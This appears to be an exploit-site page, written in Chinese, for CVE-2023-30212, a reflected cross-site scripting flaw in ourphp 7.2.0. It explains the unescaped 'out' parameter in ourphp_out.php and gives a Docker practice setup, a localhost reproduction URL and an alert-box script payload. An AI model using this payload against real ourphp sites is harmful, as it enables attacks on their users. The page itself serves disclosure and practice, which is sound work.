Sploitus

Exploit for CVE-2023-30212-POC-DOCKER-FILE

kitploit · 2026-09-06

Exploit Code

MARKDOWN53 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-RISHIPATIDAR-CVE-2023-30212-POC-DOCKER-FILE
# CVE-2023-30212 POC : 跨站脚本攻击

#### 通过 /client/manage/ourphp_out.php

## 受 CVE-2023-30212 影响的产品:

厂商| 产品| 版本  
---|---|---  
ourphp| ourphp| 7.2.0  
  
## Docker 安装指南:

要安装 OURPHP <= 7.2.0 的 Docker 环境,你可以参考 指南 搭建用于练习的 Docker 环境。

## 漏洞说明:

root@kitploit:~
    
    
    # ourphp 7.2.0 版本存在 XSS(跨站脚本攻击)漏洞。
    # 在 /client/manage/ourphp_out.php 文件中,存在一个直接的 echo 功能,结合可控的变量,攻击者可以执行 XSS 代码。
    # 当 ourphp_admin 参数设置为 "logout" 时,我们会输出一个名为 "out" 的可控变量。
    # 为了利用该漏洞,我们添加了一个 script 标签并闭合它,从而形成我们的 payload。
    # 通过 "out" 参数注入以下脚本即可利用此漏洞:</script><script>alert(xss)</script>
    

## 复现步骤:

root@kitploit:~
    
    
    # 完成 Docker 环境搭建后,直接访问以下路径:
    http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert(`xss`)</script>
    

## 漏洞利用 Payload:

root@kitploit:~
    
    
    # </script><script>alert(`xss`)</script>
    

## 视频

![CVE-2023-30212](https://assets.kitploit.com/production/public/readmes/20161/db6b95edeb802c7efb2c9370a5a7f0d3f0a9e266f415c6108e6e3d037cfa8e51.png)

## 参考文献

  1. NIST
  2. cve.mitre.org
  3. Ourphp <= 7.2.0 参考代码